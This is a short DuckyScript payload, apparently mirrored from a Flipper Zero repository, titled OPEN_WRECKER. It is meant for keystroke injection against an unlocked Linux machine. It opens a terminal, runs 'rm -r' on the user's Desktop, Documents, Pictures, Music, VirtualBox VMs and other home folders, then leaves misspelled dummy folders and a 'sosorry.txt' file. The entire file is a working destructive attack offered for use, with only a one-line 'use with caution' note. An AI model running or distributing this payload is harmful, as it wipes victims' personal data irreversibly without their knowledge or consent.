mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-21 14:00:13 +00:00
22 lines
519 B
Plaintext
22 lines
519 B
Plaintext
REM Author: FLIZZ3R
|
|
REM TITLE: OPEN_WRECKER
|
|
REM OBJECTIVE: wipe open linux machines Directories then create dummy directories and sorry text file
|
|
REM Note from UberGuidoz - DESTRUCTIVE! USE WITH CAUTION.
|
|
DELAY 500
|
|
WINDOWS d
|
|
DELAY 300
|
|
CTRL-ALT t
|
|
DELAY 1500
|
|
STRING rm -r Desktop Downloads Pictures snap Documents Music Public Templates 'VirtualBox VMs'
|
|
ENTER
|
|
DELAY 1500
|
|
STRING mkdir Deskop downloadz Pics Dox Music Public TEMPS Vms
|
|
ENTER
|
|
DELAY 500
|
|
STRING cd Deskop
|
|
ENTER
|
|
DELAY 500
|
|
STRING touch sosorry.txt
|
|
ENTER
|
|
ALT F4
|